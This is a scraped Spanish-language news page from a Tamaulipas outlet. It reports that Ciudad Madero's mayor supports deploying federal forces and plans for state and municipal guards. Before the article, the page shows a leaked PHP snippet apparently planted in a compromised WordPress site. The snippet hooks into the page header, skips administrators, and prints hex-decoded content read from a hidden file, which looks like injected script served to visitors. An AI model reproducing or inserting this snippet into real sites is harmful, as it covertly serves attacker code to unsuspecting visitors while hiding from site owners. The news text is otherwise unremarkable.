if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Adrián Oseguera apoya presencia de Fuerzas Federales – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Adrián Oseguera apoya presencia de Fuerzas Federales

Adrián Oseguera apoya presencia de Fuerzas Federales

Ciudad Madero Tamaulipas.- Ante la nueva estrategia del Gobierno del Estado, encabezado por el Dr. Américo Villarreal Guerra, quien en sus primeros tres días de Gobierno, anuncia la presencia de 600 elementos de la Secretaria de la Defensa Nacional, que estarán distribuidos en Ciudad Victoria y la zona sur de Tamaulipas.

Adrián Oseguera Kernion, alcalde de Madero, señaló la excelente disposición de que se refuerce la seguridad con fuerzas federales, como lo es la Sedena y Armada de México, en donde la seguridad, señaló,  es importante para el sur de Tamaulipas.

EN PROYECTO NACIONAL LA GUARDIA ESTATAL Y MUNICIPAL

Oseguera Kernion, confirmó que existe el proyecto Nacional de crear la Guardia Estatal y la Guardia Municipal, que sería de gran ayuda para combatir los delitos del fuero común.

Señaló que es un presupuesto alto y se está a la espera a lo que decida la federación y el Gobierno del Estado.

Madero, necesitaría por lo menos 200 policías municipales, pero los expertos en seguridad, tendrán la última palabra.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas